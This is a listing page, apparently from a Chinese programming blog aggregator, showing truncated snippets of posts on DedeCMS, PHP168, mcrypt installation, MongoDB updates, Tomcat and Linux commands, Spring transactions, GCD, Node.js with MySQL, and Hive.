    1、Dede(织梦)发表文章时,内容自动添加关键字显示空白页 解决方法: 后台>系统>系统基本参数>核心设置>关键字替换(是/否),这里选择“是”。 后台>系统>系统基本参数>其他选项>自动提取关键字,这里选择“是”。   2、解决PHP168超级管理员上传图片提示你的空间不足 网站是用PHP168做的,反映使用管理员在后台无法
  • mac 下 安装php扩展 - mcrypt dcj3sjt126com PHP
    MCrypt是一个功能强大的加密算法扩展库,它包括有22种算法,phpMyAdmin依赖这个PHP扩展,具体如下: 下载并解压libmcrypt-2.5.8.tar.gz。 在终端执行如下命令: tar zxvf libmcrypt-2.5.8.tar.gz cd libmcrypt-2.5.8/ ./configure --disable-posix-threads --
  • MongoDB更新文档 [四] eksliang mongodbMongodb更新文档
    MongoDB更新文档 转载请出自出处:http://eksliang.iteye.com/blog/2174104 MongoDB对文档的CURD,前面的博客简单介绍了,但是对文档更新篇幅比较大,所以这里单独拿出来。 语法结构如下: db.collection.update( criteria, objNew, upsert, multi) 参数含义 参数   
  • Linux下的解压,移除,复制,查看tomcat命令 y806839048 tomcat
    重复myeclipse生成webservice有问题删除以前的,干净 1、先切换到:cd usr/local/tomcat5/logs 2、tail -f catalina.out 3、这样运行时就可以实时查看运行日志了 Ctrl+c 是退出tail命令。 有问题不明的先注掉   cp /opt/tomcat-6.0.44/webapps/g
  • Spring之使用事务缘由(3-XML实现) ihuning spring
      用事务通知声明式地管理事务   事务管理是一种横切关注点。为了在 Spring 2.x 中启用声明式事务管理,可以通过 tx Schema 中定义的 <tx:advice> 元素声明事务通知,为此必须事先将这个 Schema 定义添加到 <beans> 根元素中去。声明了事务通知后,就需要将它与切入点关联起来。由于事务通知是在 <aop:
  • GCD使用经验与技巧浅谈 啸笑天 GC
    前言 GCD(Grand Central Dispatch)可以说是Mac、iOS开发中的一大“利器”,本文就总结一些有关使用GCD的经验与技巧。 dispatch_once_t必须是全局或static变量 这一条算是“老生常谈”了,但我认为还是有必要强调一次,毕竟非全局或非static的dispatch_once_t变量在使用时会导致非常不好排查的bug,正确的如下: 1
  • linux(Ubuntu)下常用命令备忘录1 macroli linux工作ubuntu
    在使用下面的命令是可以通过--help来获取更多的信息1,查询当前目录文件列表:ls ls命令默认状态下将按首字母升序列出你当前文件夹下面的所有内容,但这样直接运行所得到的信息也是比较少的,通常它可以结合以下这些参数运行以查询更多的信息:  ls / 显示/.下的所有文件和目录  ls -l 给出文件或者文件夹的详细信息 ls -a 显示所有文件,包括隐藏文
  • nodejs同步操作mysql qiaolevip 学习永无止境每天进步一点点mysqlnodejs
    // db-util.js var mysql = require('mysql'); var pool = mysql.createPool({ connectionLimit : 10, host: 'localhost', user: 'root', password: '', database: 'test', port: 3306 });
  • 一起学Hive系列文章 superlxw1234 hiveHive入门
      [一起学Hive]系列文章 目录贴,入门Hive,持续更新中。   [一起学Hive]之一—Hive概述,Hive是什么 [一起学Hive]之二—Hive函数大全-完整版 [一起学Hive]之三—Hive中的数据库(Database)和表(Table) [一起学Hive]之四-Hive的安装配置 [一起学Hive]之五-Hive的视图和分区 [一起学Hive
  • Spring开发利器:Spring Tool Suite 3.7.0 发布 wiselyman spring
    Spring Tool Suite(简称STS)是基于Eclipse,专门针对Spring开发者提供大量的便捷功能的优秀开发工具。   在3.7.0版本主要做了如下的更新:   将eclipse版本更新至Eclipse Mars 4.5 GA Spring Boot(JavaEE开发的颠覆者集大成者,推荐大家学习)的配置语言YAML编辑器的支持(包含自动提示,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他